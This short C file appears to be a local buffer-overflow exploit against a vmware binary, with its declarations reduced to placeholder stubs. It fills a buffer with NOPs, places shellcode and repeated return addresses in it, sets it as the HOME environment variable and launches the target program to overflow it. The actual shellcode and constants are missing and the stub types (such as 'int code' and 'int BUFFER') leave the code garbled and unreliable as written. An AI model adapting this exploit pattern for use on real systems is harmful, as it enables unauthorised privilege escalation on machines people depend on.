
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFFER ;
 int NOP ;
 int PATH ;
 int RET_ADDR ;
 int atoi (char*) ;
 int * buf ;
 int code ;
 int execl (int ,char*,char*,char*,int ) ;
 int memcpy (int *,int ,int ) ;
 int memset (int *,int ,int) ;
 int setenv (char*,int *,int) ;
 int strlen (int ) ;

void main(int argc, char * argv[])
{
  int i, offset = 0;
  if(argc > 1) offset = atoi(argv[1]);

 memset(buf,NOP,BUFFER);
 memcpy(buf+800,code,strlen(code));
 for(i=854+2;i<BUFFER-2;i+=4)
   *(int *)&buf[i]=RET_ADDR+offset;

  setenv("HOME", buf, 1);
  execl(PATH,"vmware","-display","127.0.0.1:0",0);

}
